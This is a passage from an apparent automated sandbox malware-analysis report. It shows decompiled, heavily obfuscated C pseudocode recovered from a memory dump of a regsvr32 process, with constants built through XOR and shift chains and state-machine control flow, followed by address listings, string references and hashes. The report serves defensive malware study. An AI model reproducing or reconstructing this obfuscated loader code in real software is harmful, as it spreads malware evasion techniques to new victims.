									__eflags = _t447;
									if(__eflags != 0) {
										_t504 = 0x835d4;
										goto L11;
									}
								} else {
									_t397 = 0x3de19;
									if(_t504 == 0x3de19) {
										_v52 = 0x713e44;
										_v52 = _v52 | 0x20c952b5;
										_v52 = _v52 ^ 0x20f97ef4;
										_v68 = 0x196bf5;
										_v68 = _v68 >> 0xb;
										_v68 = _v68 + 0xffff1e64;
										_v68 = _v68 ^ 0xfff0bd0d;
										_v64 = 0xbf1334;
										_v64 = _v64 | 0xd9824d9b;
										_v64 = _v64 ^ 0x03c1f353;
										_v64 = _v64 ^ 0xda787552;
										_v48 = 0x1417d;
										_v48 = _v48 >> 6;
										_v48 = _v48 ^ 0x0006368c;
										_v60 = 0x3e0bc9;
										_v60 = _v60 >> 4;
										_v60 = _v60 + 0x96f7;
										_v60 = _v60 ^ 0x00047b40;
										_t442 = E003D0895(_t452, _v68,  &_v16, _v64, _v52, _v28, _v48, _v60, _t509);
										_v68 = 0xbfb279;
										__eflags = _t442;
										_t504 =  !=  ? 0x58cf1 : 0xb82ad;
										_v68 = _v68 >> 8;
										_v68 = _v68 + 0xffff2a58;
										_v68 = _v68 << 0xb;
										_v68 = _v68 ^ 0xff5bb02c;
										_v52 = 0x99b40c;
										_v52 = _v52 + 0x70f0;
										_v52 = _v52 ^ 0x009a5f74;
										_v48 = 0xa41f31;
										_v48 = _v48 >> 0xb;
										_v48 = _v48 ^ 0x00017043;
										_t397 = E003DA952(_v68, _v52, _v48, _v28);
										_t511 =  &(_t511[9]);
										L28:
										_t452 = _v56;
										_t474 = 0x58cf1;
										goto L29;
									} else {
										if(_t504 != _t474) {
											L29:
											__eflags = _t504 - 0x95428;
											if(__eflags != 0) {
												_t397 = _v44;
												while(1) {
													_t514 = _t504 - 0x5ca55;
													if(_t514 <= 0) {
													}
													goto L20;
												}
												goto L3;
											}
										} else {
											_v60 = 0xae335d;
											_v60 = _v60 * 0x76;
											_v60 = _v60 << 1;
											_v60 = _v60 ^ 0xa09759bd;
											_v68 = 0xa030c1;
											_v68 = _v68 + 0x4357;
											_v68 = _v68 | 0x6ec66b3f;
											_v68 = _v68 ^ 0x15ae0532;
											_v68 = _v68 ^ 0x7b44b6a2;
											_v48 = 0xfa5b18;
											_v48 = _v48 * 0x1d;
											_v48 = _v48 ^ 0x1c5b5a85;
											E003D85FC(_t509, _a12, _v68, _v48, _v60);
											_t511 =  &(_t511[3]);
											L10:
											_t504 = 0x60b76;
											L11:
											_t397 = _v44;
											L12:
											_t452 = _v56;
											goto L1;
										}
									}
								}
							}
						}
						L32:
						return _t397;
						goto L33;
						L20:
						__eflags = _t504 - 0x60b76;
						if(_t504 == 0x60b76) {
							_v48 = 0xfbd3ac;
							_v48 = _v48 + 0xffff3d46;
							_v48 = _v48 >> 0xe;
							_v48 = _v48 ^ 0x0007ff11;
							_v40 = 0x491f2d;
							_v40 = _v40 >> 0xb;
							_v40 = _v40 ^ 0x00072a20;
							_v36 = 0x78f58;
							_v36 = _v36 << 7;
							_v36 = _v36 ^ 0x03c0e124;
							_v32 = 0xfc8937;
							_v32 = _v32 + 0xffff554b;
							_t344 =  &_v32;
							 *_t344 = _v32 ^ 0x00f1aa16;
							__eflags =  *_t344;
							_t397 = E003C79D0(_v48, _v40,  *_t344, _v36, _t509, _v32);
							_t511 =  &(_t511[3]);
							_t504 = 0x89e1;
							goto L28;
						} else {
							__eflags = _t504 - 0x825ce;
							if(__eflags == 0) {
								_t504 = 0x35be6;
								continue;
							} else {
								__eflags = _t504 - 0x835d4;
								if(__eflags == 0) {
									_v60 = 0x105b42;
									_v60 = _v60 | 0xe705ac87;
									_v60 = _v60 ^ 0x1c7742df;
									_v60 = _v60 ^ 0xfb6c89b9;
									_v52 = 0x825bb9;
									_v52 = _v52 | 0xa486bde3;
									_push(_t452);
									_push(_t452);
									_v52 = _v52 * 0x24;
									_v52 = _v52 ^ 0x22f3ebc0;
									_v48 = 0xd13a27;
									_v48 = _v48 * 0x79;
									_v48 = _v48 + 0x85e5;
									_v48 = _v48 ^ 0x62e3a3e0;
									_t435 = E003C8D52(_t452, _t452, __eflags); // executed
									_t509 = _t435;
									_t505 = 0x89e1;
									__eflags = _t435;
									_t408 = 0x102f6;
									goto L19;
								} else {
									__eflags = _t504 - 0xb82ad;
									if(_t504 != 0xb82ad) {
										goto L29;
									} else {
										_t506 = 0x2c;
										_t501 = _t501 + _t506;
										__eflags = _t501 - _t397;
										asm("sbb esi, esi");
										_t504 = (_t506 & 0xffffbedf) + 0x60b76;
										continue;
									}
								}
							}
						}
						goto L32;
					}
				}
			}

0x003d31dc
0x003d31e0
0x003d31e4
0x003d31e8
0x003d31ec
0x003d31ed
0x003d31ee
0x003d31f3
0x003d31fb
0x003d31fe
0x003d3202
0x003d3206
0x003d320b
0x003d3213
0x003d321b
0x003d321e
0x003d3222
0x003d322a
0x003d3236
0x003d323e
0x003d3242
0x003d324e
0x003d3252
0x003d3256
0x003d325a
0x003d325e
0x003d325e
0x003d325e
0x003d3263
0x003d3263
0x003d3269
0x003d3269
0x003d326f
0x003d326f
0x003d36bb
0x003d36c5
0x003d36d4
0x003d36d7
0x003d36db
0x003d36e3
0x003d36f0
0x003d36fa
0x003d36fb
0x003d3701
0x003d3709
0x003d3711
0x003d3719
0x003d3725
0x003d372f
0x003d3730
0x003d3736
0x003d373e
0x003d3750
0x003d3754
0x003d375c
0x003d376e
0x003d3773
0x003d3776
0x003d377a
0x003d377c
0x003d3781
0x003d3786
0x003d3786
0x00000000
0x003d3275
0x003d327b
0x003d3905
0x003d390f
0x003d3914
0x003d391c
0x003d3924
0x003d392c
0x003d3934
0x003d393c
0x003d3944
0x003d394c
0x003d395b
0x003d395c
0x003d3960
0x003d3968
0x003d3970
0x003d3978
0x003d397d
0x003d398b
0x003d398f
0x003d398f
0x003d398f
0x00000000
0x003d39ad
0x003d3288
0x003d34ef
0x003d34f9
0x003d3501
0x003d3506
0x003d350e
0x003d3516
0x003d351b
0x003d3523
0x003d352b
0x003d3530
0x003d353f
0x003d3542
0x003d3546
0x003d354e
0x003d3556
0x003d355e
0x003d3566
0x003d356e
0x003d3572
0x003d357a
0x003d3582
0x003d358d
0x003d358e
0x003d3594
0x003d359c
0x003d35a4
0x003d35b4
0x003d35ba
0x003d35c3
0x003d35c4
0x003d35c8
0x003d35d0
0x003d35d8
0x003d35e2
0x003d35ea
0x003d362b
0x003d3630
0x003d3633
0x003d3635
0x00000000
0x003d363b
0x003d363b
0x003d3643
0x003d364b
0x003d3653
0x003d365b
0x003d3663
0x003d366b
0x003d3673
0x003d367b
0x003d367f
0x003d368f
0x003d36a1
0x003d36a9
0x003d36ab
0x003d36ad
0x003d36b1
0x003d36b3
0x00000000
0x003d36b3
0x00000000
0x003d328e
0x003d3294
0x003d345e
0x003d346e
0x003d3475
0x003d3479
0x003d3481
0x003d3489
0x003d3491
0x003d3499
0x003d34a1
0x003d34a9
0x003d34b1
0x003d34b9
0x003d34be
0x003d34d2
0x003d34d3
0x003d34d4
0x003d34d9
0x003d34dd
0x003d34df
0x003d34e5
0x00000000
0x003d34e5
0x003d329a
0x003d329a
0x003d32a1
0x003d3339
0x003d3345
0x003d334d
0x003d3355
0x003d335d
0x003d3362
0x003d336a
0x003d3372
0x003d337a
0x003d3382
0x003d338a
0x003d3392
0x003d339a
0x003d339f
0x003d33a7
0x003d33af
0x003d33b4
0x003d33bc
0x003d33de
0x003d33e7
0x003d33ef
0x003d33fb
0x003d33fe
0x003d3403
0x003d340b
0x003d3410
0x003d3418
0x003d3420
0x003d3428
0x003d3430
0x003d3438
0x003d343d
0x003d3451
0x003d3456
0x003d38e7
0x003d38e7
0x003d38eb
0x00000000
0x003d32a7
0x003d32a9
0x003d38f0
0x003d38f0
0x003d38f6
0x003d38fc
0x003d3263
0x003d3263
0x003d3269
0x003d3269
0x00000000
0x003d3269
0x00000000
0x003d3263
0x003d32af
0x003d32af
0x003d32c2
0x003d32c6
0x003d32ca
0x003d32d2
0x003d32da
0x003d32e2
0x003d32ea
0x003d32f2
0x003d32fa
0x003d3307
0x003d330b
0x003d331f
0x003d3324
0x003d3327
0x003d3327
0x003d332c
0x003d332c
0x003d3330
0x003d3330
0x00000000
0x003d3330
0x003d32a9
0x003d32a1
0x003d3294
0x003d3288
0x003d39b7
0x003d39b7
0x00000000
0x003d378e
0x003d378e
0x003d3794
0x003d386a
0x003d3872
0x003d387a
0x003d387f
0x003d3887
0x003d388f
0x003d3894
0x003d389c
0x003d38a4
0x003d38a9
0x003d38b1
0x003d38b9
0x003d38c1
0x003d38c1
0x003d38c1
0x003d38da
0x003d38df
0x003d38e2
0x00000000
0x003d379a
0x003d379a
0x003d37a0
0x003d3860
0x00000000
0x003d37a6
0x003d37a6
0x003d37ac
0x003d37d4
0x003d37de
0x003d37e6
0x003d37ee
0x003d37f6
0x003d37fe
0x003d380b
0x003d380c
0x003d380d
0x003d3811
0x003d3819
0x003d3826
0x003d382a
0x003d3832
0x003d3846
0x003d384b
0x003d384d
0x003d3854
0x003d3856
0x00000000
0x003d37ae
0x003d37ae
0x003d37b4
0x00000000
0x003d37ba
0x003d37bc
0x003d37bd
0x003d37bf
0x003d37c1
0x003d37c9
0x00000000
0x003d37c9
0x003d37b4
0x003d37ac
0x003d37a0
0x00000000
0x003d3794
0x003d3263

Strings

&, xrefs: 003D3934
Ji, xrefs: 003D3546
5kM, xrefs: 003D391C
b&, xrefs: 003D3566
+6JU, xrefs: 003D3556
?C"9, xrefs: 003D364B
-B, xrefs: 003D375C
D>q, xrefs: 003D3339
(T, xrefs: 003D38F0

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: Ji$&$(T$+6JU$-B$5kM$?C"9$D>q$b&
API String ID: 1725840886-3960127423
Opcode ID: ad07b576ee7c06001bb77136fa2794c6752adc49700f8f1d6b87e3dc7dee3b5d
Instruction ID: 2c5138271fbb2a8bdb533df3b799ee34c0f057d6aac8523063b297b8468fbdb4
Opcode Fuzzy Hash: ad07b576ee7c06001bb77136fa2794c6752adc49700f8f1d6b87e3dc7dee3b5d
Instruction Fuzzy Hash: 9212327250D3429BC359CF24D58680BBBE1BBD8748F005A2DF5D5A6260D7B5CA48CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003C25E7 Relevance: 9.0, Strings: 7, Instructions: 283
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E003C25E7(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t275;
				void* _t278;
				signed int _t287;
				intOrPtr _t296;
				intOrPtr _t304;
				intOrPtr* _t305;
				intOrPtr* _t311;
				void* _t312;
				void* _t313;
				signed int _t315;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t325;
				void* _t343;
				intOrPtr _t346;
				intOrPtr* _t348;
				void* _t352;
				signed int* _t356;

				_t315 = __ecx;
				_t356 =  &_v36;
				_v16 = 0xe547d;
				_t313 = 0;
				_v12 = 0xb0986;
				_v8 = 0x41e1d;
				_t352 = 0x94751;
				_v4 = 0xbe50e;
				while(1) {
					L1:
					_t275 = 0xfef55;
					do {
						L2:
						if(_t352 == 0x109f7) {
							_v28 = 0xf3a740;
							_v28 = _v28 >> 7;
							_v28 = _v28 ^ 0x0001bdd7;
							_v24 = 0x6f2569;
							_v24 = _v24 | 0xf5504dd8;
							_v24 = _v24 << 0xe;
							_t216 =  &_v24;
							 *_t216 = _v24 ^ 0xdb7f0668;
							__eflags =  *_t216;
							E003D8B16(_v28, _v20, _t315, _v24);
							_pop(_t315);
							_t352 = 0xb232;
							L13:
							_t275 = 0xfef55;
							goto L14;
						}
						if(_t352 == 0x471bd) {
							_v36 = 0xa89a11;
							_v36 = _v36 >> 7;
							_v36 = _v36 >> 0xb;
							_v36 = _v36 ^ 0xfafc3a37;
							_v36 = _v36 ^ 0xfafaf674;
							_v32 = 0xf4016a;
							_v32 = _v32 | 0xbe0c9bb0;
							_v32 = _v32 ^ 0xbefb3781;
							_v28 = 0x25f70d;
							_v28 = _v28 >> 6;
							_v28 = _v28 * 0x55;
							_v28 = _v28 ^ 0x003ffef0;
							_v24 = 0x31a34d;
							_v24 = _v24 >> 9;
							_v24 = _v24 ^ 0x000abcb0;
							_t278 = E003CD933(_v36, _v32, 0x3c1780, _v28, _v24);
							_v24 = 0x8389bc;
							_v24 = _v24 >> 1;
							_v24 = _v24 * 0x1c;
							_v24 = _v24 ^ 0x073bb0d9;
							_v28 = 0x13b186;
							_v28 = _v28 >> 2;
							_t320 = 0x63;
							_v28 = _v28 / _t320;
							_v28 = _v28 ^ 0x000921c8;
							_v32 = 0xc65c18;
							_t321 = 0x11;
							_v32 = _v32 / _t321;
							_t322 = 0x77;
							_v32 = _v32 / _t322;
							_v32 = _v32 >> 0xd;
							_v32 = _v32 ^ 0x000d19a3;
							_v36 = 0xda140f;
							_v36 = _v36 << 4;
							_t323 = 0x35;
							_v36 = _v36 / _t323;
							_v36 = _v36 >> 0x10;
							_v36 = _v36 ^ 0x000e718e;
							_t287 = E003C22D2( &_v20, _v24, _t278, _v28, _v32, 0, _v36); // executed
							_v28 = 0x532712;
							__eflags = _t287;
							_t352 =  ==  ? 0xfef55 : 0xd86ab;
							_v28 = _v28 + 0xffffbf9e;
							_v28 = _v28 >> 3;
							_v28 = _v28 ^ 0x000b12c7;
							_v32 = 0x8ab7a7;
							_v32 = _v32 + 0x8bfe;
							_v32 = _v32 ^ 0x0083f6c2;
							_v24 = 0x4cd478;
							_v24 = _v24 >> 1;
							_v24 = _v24 ^ 0x2c4560ca;
							_v24 = _v24 ^ 0x2c6e31a1;
							_t315 = _v28;
							E003C43D3(_t315, _v32, _v24, _t278);
							_t356 =  &(_t356[0xb]);
							goto L13;
						}
						if(_t352 == 0x94751) {
							_v32 = 0xfa0877;
							_v32 = _v32 >> 1;
							_push(_t315);
							_push(_t315);
							_t343 = 0x3c;
							_v32 = _v32 * 0x5a;
							_v32 = _v32 ^ 0x2bf75569;
							_v28 = 0x5520a;
							_v28 = _v28 << 0xc;
							_v28 = _v28 * 0x63;
							_v28 = _v28 ^ 0xeb93866a;
							_v24 = 0xc4ca27;
							_v24 = _v24 + 0x697;
							_v24 = _v24 ^ 0x00c6b7d4;
							 *0x3e2220 = E003C8D52(_t315, _t343, __eflags);
							_v24 = 0x1e041e;
							_v24 = _v24 ^ 0x10b6db8b;
							_v24 = _v24 ^ 0x10a89f95;
							_t296 =  *0x3e2220; // 0x251e68
							 *((intOrPtr*)(_t296 + 4)) = _v24;
							_v36 = 0xb1bf61;
							_v36 = _v36 | 0xbb81fb71;
							_t325 = 0x47;
							_v36 = _v36 / _t325;
							_v36 = _v36 + 0xeb28;
							_v36 = _v36 ^ 0x02a5ca98;
							_v32 = 0x1975b7;
							_v32 = _v32 + 0x2674;
							_v32 = _v32 * 0xe;
							_v32 = _v32 ^ 0x016f0ffb;
							_v28 = 0x9d2169;
							_v28 = _v28 + 0x6da8;
							_v28 = _v28 * 0x72;
							_v28 = _v28 ^ 0x462969e7;
							_t346 =  *0x3e2220; // 0x251e68
							_t96 = _t346 + 4; // 0x4000, executed
							_t304 = E003C8D52(_t325,  *_t96, __eflags);
							_t348 =  *0x3e2220; // 0x251e68
							_t352 = 0x471bd;
							_t97 = _t348 + 4; // 0x4000
							_t315 =  *_t97 + _t304;
							 *_t348 = _t304;
							 *((intOrPtr*)(_t348 + 0x34)) = _t304;
							 *((intOrPtr*)(_t348 + 0x18)) = _t304;
							 *(_t348 + 0x38) = _t315;
							while(1) {
								L1:
								_t275 = 0xfef55;
								goto L2;
							}
						}
						if(_t352 == 0xd86ab) {
							_v36 = 0x3e6baa;
							_v36 = _v36 + 0xffff1c4f;
							_v36 = _v36 ^ 0x00346f38;
							_v32 = 0xae2c9e;
							_v32 = _v32 + 0x2122;
							_v32 = _v32 ^ 0x00a79c1e;
							_v24 = 0xf42f21;
							_v24 = _v24 ^ 0x2f51def6;
							_v24 = _v24 + 0xacbb;
							_v24 = _v24 ^ 0x2fa02ce1;
							_v28 = 0xa6b8a4;
							_v28 = _v28 | 0x391e628d;
							_v28 = _v28 ^ 0x39b22fdb;
							_t305 =  *0x3e2220; // 0x251e68
							E003C79D0(_v36, _v32, __eflags, _v24,  *_t305, _v28);
							_v36 = 0xe0cf03;
							_v36 = _v36 * 0x67;
							_v36 = _v36 ^ 0x5a72619c;
							_v28 = 0x5bb991;
							_v28 = _v28 << 5;
							_v28 = _v28 >> 4;
							_v28 = _v28 ^ 0x00bff12b;
							_v32 = 0x4faa73;
							_v32 = _v32 >> 0xb;
							_v32 = _v32 ^ 0x000ffa49;
							_v24 = 0x7a5d06;
							_v24 = _v24 << 0xf;
							_v24 = _v24 * 0x77;
							_t269 =  &_v24;
							 *_t269 = _v24 ^ 0x9eec074d;
							__eflags =  *_t269;
							E003C79D0(_v36, _v28,  *_t269, _v32,  *0x3e2220, _v24);
							L17:
							return _t313;
						}
						if(_t352 != _t275) {
							goto L14;
						}
						_v24 = 0xc019bd;
						_v24 = _v24 << 0xe;
						_v24 = _v24 ^ 0x066a3e11;
						_v28 = 0xc32fdb;
						_v28 = _v28 ^ 0xd71d4e68;
						_v28 = _v28 + 0xffffdcb3;
						_v28 = _v28 ^ 0xd7db827c;
						_v36 = 0x69a2ed;
						_v36 = _v36 + 0xfffff0bf;
						_v36 = _v36 + 0xffff3c58;
						_v36 = _v36 ^ 0x00677161;
						_v32 = 0xab298f;
						_v32 = _v32 | 0x958e58b7;
						_v32 = _v32 >> 7;
						_v32 = _v32 ^ 0x0126ea83;
						_t311 =  *0x3e2220; // 0x251e68
						_t315 = _v24;
						_t36 = _t311 + 4; // 0x4000, executed
						_t312 = E003DEDA4(_t315, _v28,  *_t36,  *_t311, _t315, _v20, _v36, _v32); // executed
						_t356 =  &(_t356[6]);
						if(_t312 != 0) {
							_t352 = 0xd86ab;
						} else {
							_t352 = 0x109f7;
							_t313 = 1;
						}
						goto L1;
						L14:
						__eflags = _t352 - 0xb232;
					} while (__eflags != 0);
					goto L17;
				}
			}

0x003c25e7
0x003c25e7
0x003c25ec
0x003c25f4
0x003c25f7
0x003c2605
0x003c260d
0x003c2612
0x003c261a
0x003c261a
0x003c261a
0x003c261f
0x003c261f
0x003c2625
0x003c29f9
0x003c2a01
0x003c2a06
0x003c2a0e
0x003c2a16
0x003c2a1e
0x003c2a23
0x003c2a23
0x003c2a23
0x003c2a38
0x003c2a3e
0x003c2a3f
0x003c2a44
0x003c2a44
0x00000000
0x003c2a44
0x003c2631
0x003c2843
0x003c284b
0x003c2850
0x003c2855
0x003c285d
0x003c2865
0x003c286d
0x003c2875
0x003c287d
0x003c2885
0x003c288f
0x003c2893
0x003c289b
0x003c28a3
0x003c28a8
0x003c28c5
0x003c28ca
0x003c28d4
0x003c28e1
0x003c28e5
0x003c28ed
0x003c28f5
0x003c28fe
0x003c2903
0x003c2909
0x003c2911
0x003c291d
0x003c2922
0x003c292c
0x003c2931
0x003c2937
0x003c293c
0x003c2944
0x003c294c
0x003c2955
0x003c295c
0x003c2960
0x003c2965
0x003c2980
0x003c2985
0x003c298d
0x003c2996
0x003c2999
0x003c29a1
0x003c29a6
0x003c29ae
0x003c29b6
0x003c29be
0x003c29c6
0x003c29ce
0x003c29d2
0x003c29da
0x003c29eb
0x003c29ef
0x003c29f4
0x00000000
0x003c29f4
0x003c263d
0x003c2704
0x003c270c
0x003c2715
0x003c2716
0x003c2719
0x003c271a
0x003c271e
0x003c2726
0x003c272e
0x003c2738
0x003c273c
0x003c2744
0x003c274c
0x003c2754
0x003c276d
0x003c2774
0x003c277c
0x003c2784
0x003c2790
0x003c2797
0x003c279a
0x003c27a2
0x003c27ae
0x003c27b1
0x003c27b5
0x003c27bd
0x003c27c5
0x003c27cd
0x003c27da
0x003c27de
0x003c27e6
0x003c27ee
0x003c27fb
0x003c27ff
0x003c2813
0x003c2819
0x003c281c
0x003c2821
0x003c2827
0x003c282e
0x003c2831
0x003c2833
0x003c2835
0x003c2838
0x003c283b
0x003c261a
0x003c261a
0x003c261a
0x00000000
0x003c261a
0x003c261a
0x003c2645
0x003c2a5a
0x003c2a62
0x003c2a6a
0x003c2a72
0x003c2a7a
0x003c2a82
0x003c2a8a
0x003c2a92
0x003c2a9a
0x003c2aa2
0x003c2aaa
0x003c2ab2
0x003c2aba
0x003c2ac6
0x003c2ad9
0x003c2ade
0x003c2aeb
0x003c2aef
0x003c2af7
0x003c2aff
0x003c2b04
0x003c2b09
0x003c2b11
0x003c2b19
0x003c2b1e
0x003c2b26
0x003c2b2e
0x003c2b38
0x003c2b3c
0x003c2b3c
0x003c2b3c
0x003c2b5a
0x003c2b65
0x003c2b6b
0x003c2b6b
0x003c264d
0x00000000
0x00000000
0x003c2653
0x003c265b
0x003c2660
0x003c2668
0x003c2670
0x003c2678
0x003c2680
0x003c2688
0x003c2690
0x003c2698
0x003c26a0
0x003c26a8
0x003c26b0
0x003c26b8
0x003c26bd
0x003c26cd
0x003c26dd
0x003c26e1
0x003c26e4
0x003c26e9
0x003c26ee
0x003c26fd
0x003c26f0
0x003c26f2
0x003c26f7
0x003c26f7
0x00000000
0x003c2a49
0x003c2a49
0x003c2a49
0x00000000
0x003c2a55

Strings

i%o, xrefs: 003C2A0E
QG, xrefs: 003C2637
QG, xrefs: 003C260D
i)F, xrefs: 003C27FF
(, xrefs: 003C27B5
"!, xrefs: 003C2A7A
8o4, xrefs: 003C2A6A

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "!$($8o4$QG$QG$i%o$i)F
API String ID: 0-2963096044
Opcode ID: 5fa3ca299e1223ef7fd86e1617a39ee548c1736ff9daa118936511f668019ff6
Instruction ID: 654430104e5dfe834e1222cce4bfb06f95eaef210285c03190362d198fb2f227
Opcode Fuzzy Hash: 5fa3ca299e1223ef7fd86e1617a39ee548c1736ff9daa118936511f668019ff6
Instruction Fuzzy Hash: 5BE101B11083428FC349CF25D58990BBBE1FBD8758F108A1DF5D99A261C3B5DA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 003CB1A1 Relevance: 7.8, Strings: 6, Instructions: 284
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E003CB1A1() {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				void* _t262;
				signed int _t266;
				intOrPtr _t268;
				signed int _t274;
				void* _t283;
				intOrPtr _t289;
				void* _t299;
				char _t301;
				signed int _t302;
				signed int _t305;
				signed int _t306;
				signed int _t309;
				signed int _t311;
				intOrPtr _t331;
				signed int _t335;
				void* _t338;

				_v536 = 0x7c91;
				_t262 = 0x45278;
				_t335 = _v604;
				_t299 = 0;
				_v532 = 0x941c2;
				_v528 = 0x19f1f;
				do {
					while(_t262 != 0x7bb) {
						if(_t262 == 0x3f2c2) {
							_t301 = _v588;
							_t268 = _v584;
							_v548 = _v548 & 0x00000000;
							_v576 = _t268;
							_v568 = _t268;
							_v560 = _t268;
							_v552 = _t268;
							_v580 = _t301;
							_v572 = _t301;
							_v564 = _t301;
							_v556 = _t301;
							_v620 = 0x144296;
							_v620 = _v620 + 0x944a;
							_v620 = _v620 ^ 0x0017c0fb;
							_v608 = 0xd85de8;
							_v608 = _v608 >> 5;
							_v608 = _v608 + 0x7967;
							_v608 = _v608 ^ 0x000a0ed7;
							_v616 = 0xfb322d;
							_v616 = _v616 << 5;
							_v616 = _v616 << 0xf;
							_t302 = 0x3c;
							_v616 = _v616 * 0x31;
							_v616 = _v616 ^ 0xa9d40608;
							_v624 = 0x52de99;
							_v624 = _v624 * 0x78;
							_v624 = _v624 | 0x1130c68f;
							_v624 = _v624 / _t302;
							_v624 = _v624 ^ 0x00e90943;
							_t165 =  &_v624; // 0xe90943
							_t274 = E003C2DDF(_v620, _v608, _t302, _t302, _t335, _v616,  &_v580,  *_t165); // executed
							_t338 = _t338 + 0x18;
							__eflags = _t274;
							_t262 = 0x79567;
							_t299 =  !=  ? 1 : _t299;
							continue;
						} else {
							if(_t262 == 0x45278) {
								_t262 = 0xf8a15;
								continue;
							} else {
								if(_t262 == 0x79567) {
									_v612 = 0xd00ecd;
									_v612 = _v612 | 0x45666477;
									_t241 =  &_v612; // 0x45666477
									_t305 = 0x56;
									_v612 =  *_t241 / _t305;
									_v612 = _v612 ^ 0x00d4a04a;
									_v620 = 0x32f435;
									_v620 = _v620 << 7;
									_t306 = 0x53;
									_v620 = _v620 / _t306;
									_t258 =  &_v620;
									 *_t258 = _v620 ^ 0x0042309f;
									__eflags =  *_t258;
									E003D4FB8(_t335, _v612, _v620); // executed
								} else {
									if(_t262 == 0x8eed9) {
										_v588 = _v588 - E003C8CDF();
										_t262 = 0xc4186;
										asm("sbb [esp+0x3c], edx");
										continue;
									} else {
										if(_t262 == 0xc4186) {
											_v616 = 0x973309;
											_v616 = _v616 ^ 0x330ea31c;
											_v616 = _v616 + 0xfdc;
											_v616 = _v616 ^ 0x33904043;
											_v624 = 0x4628d5;
											_v624 = _v624 + 0xd3c7;
											_v624 = _v624 >> 5;
											_v624 = _v624 + 0xffff203d;
											_v624 = _v624 ^ 0x000013fb;
											_v612 = 0x1ea815;
											_v612 = _v612 << 2;
											_v612 = _v612 ^ 0x0074de1b;
											_v620 = 0x5f4932;
											_t309 = 0x7d;
											_v620 = _v620 / _t309;
											_v620 = _v620 ^ 0x0004258e;
											_t283 = E003CD933(_v616, _v624, 0x3c1000, _v612, _v620);
											_v608 = 0x81d8e2;
											_v608 = _v608 + 0x80c3;
											_v608 = _v608 ^ 0x008cd6ae;
											_v612 = 0x273f32;
											_t68 =  &_v612; // 0x273f32
											_t311 = 0x2e;
											_v612 =  *_t68 * 0x3a;
											_v612 = _v612 ^ 0x08e85b8f;
											_v620 = 0xfed09d;
											_v620 = _v620 * 0x34;
											_v620 = _v620 ^ 0x33cfcc61;
											_v616 = 0xcc72c1;
											_v616 = _v616 >> 1;
											_v616 = _v616 / _t311;
											_v616 = _v616 ^ 0x0005b620;
											_t289 =  *0x3e2208; // 0x28e510
											_t331 =  *0x3e2208; // 0x28e510
											_t93 = _t331 + 0x1c; // 0x3a0043
											E003D0E90(_t93, __eflags, _t311, _v612, _v620, _t289 + 0x22c,  &_v524, _v616, _t283);
											_v624 = 0x8275db;
											_t338 = _t338 + 0x28;
											_v624 = _v624 << 4;
											_v624 = _v624 * 0x12;
											_v624 = _v624 ^ 0x92ce4b34;
											_v616 = 0xfc3f69;
											_v616 = _v616 << 1;
											_v616 = _v616 * 0x74;
											_v616 = _v616 ^ 0xe49ff821;
											_v620 = 0x23719b;
											_v620 = _v620 | 0x2232a5e6;
											_v620 = _v620 ^ 0x223e2fb3;
											E003C43D3(_v624, _v616, _v620, _t283);
											_t262 = 0x7bb;
											continue;
										} else {
											if(_t262 != 0xf8a15) {
												goto L16;
											} else {
												_v624 = 0xfdc7c9;
												_v624 = _v624 * 0x49;
												_v624 = _v624 * 0x39;
												_v624 = _v624 + 0x8b95;
												_v624 = _v624 ^ 0x1cea45e0;
												_v612 = 0x8fbc65;
												_v612 = _v612 << 9;
												_v612 = _v612 ^ 0x1f70643f;
												_v620 = 0xb646e2;
												_v620 = _v620 | 0x4c88af4c;
												_v620 = _v620 ^ 0x4cb5a2f0;
												E003CE9D9(_v624, _v612,  &_v588, _v620);
												_t262 = 0x8eed9;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t299;
					}
					_v612 = 0x91857c;
					_v612 = _v612 + 0xff38;
					_v612 = _v612 | 0xc4f81af5;
					_v612 = _v612 ^ 0xc4fa9ef4;
					_v620 = 0x517a64;
					_v620 = _v620 + 0xffff5959;
					_v620 = _v620 | 0x08d026c1;
					_v620 = _v620 ^ 0x08d0f6fd;
					_v596 = 0x25dc9d;
					_v596 = _v596 + 0xffff5b63;
					_v596 = _v596 ^ 0x00253803;
					_v604 = 0xcc6450;
					_v604 = _v604 + 0xffffa13b;
					_v604 = _v604 ^ 0x00ca8308;
					_v624 = 0x9fec28;
					_v624 = _v624 >> 2;
					_v624 = _v624 << 5;
					_v624 = _v624 * 0x54;
					_v624 = _v624 ^ 0xa3ca6aa6;
					_v600 = 0x8c1f79;
					_v600 = _v600 + 0xffff1829;
					_v600 = _v600 ^ 0x0086c3a8;
					_v608 = 0x4a4bd1;
